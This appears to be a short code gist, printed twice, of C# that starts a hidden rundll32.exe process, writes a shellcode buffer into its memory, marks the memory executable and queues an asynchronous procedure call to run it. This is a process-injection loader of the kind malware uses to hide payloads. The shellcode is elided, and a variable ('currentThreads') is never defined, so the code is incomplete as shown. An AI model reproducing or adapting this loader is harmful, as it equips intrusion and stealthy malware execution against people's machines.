djhohnstein/InjectUserAPC!Main.cs Secret

## InjectUserAPC!Main.cs
static void Main(string[] args) {
    byte[] sc = { ... };
    string processpath = @"C:\Windows\system32\rundll32.exe";
    STARTUPINFO si = new STARTUPINFO();
    PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    bool success = CreateProcess(processpath, null,
        IntPtr.Zero, IntPtr.Zero, false,
        ProcessCreationFlags.CREATE_NO_WINDOW,
        IntPtr.Zero, null, ref si, out pi);
    IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, sc.Length, MEM_COMMIT, PAGE_READWRITE);
    IntPtr bytesWritten = IntPtr.Zero;
    bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, sc, sc.Length, out bytesWritten);
    Process targetProc = Process.GetProcessById((int)pi.dwProcessId);
    IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id);
    uint oldProtect = 0;
    resultBool = VirtualProtectEx(pi.hProcess, resultPtr, sc.Length, PAGE_EXECUTE_READ, out oldProtect);
    IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);
}
	static void Main(string[] args) {
	byte[] sc = { ... };
	string processpath = @"C:\Windows\system32\rundll32.exe";
	STARTUPINFO si = new STARTUPINFO();
	PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
	bool success = CreateProcess(processpath, null,
	IntPtr.Zero, IntPtr.Zero, false,
	ProcessCreationFlags.CREATE_NO_WINDOW,
	IntPtr.Zero, null, ref si, out pi);
	IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, sc.Length, MEM_COMMIT, PAGE_READWRITE);
	IntPtr bytesWritten = IntPtr.Zero;
	bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, sc, sc.Length, out bytesWritten);
	Process targetProc = Process.GetProcessById((int)pi.dwProcessId);
	IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id);
	uint oldProtect = 0;
	resultBool = VirtualProtectEx(pi.hProcess, resultPtr, sc.Length, PAGE_EXECUTE_READ, out oldProtect);
	IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);
	}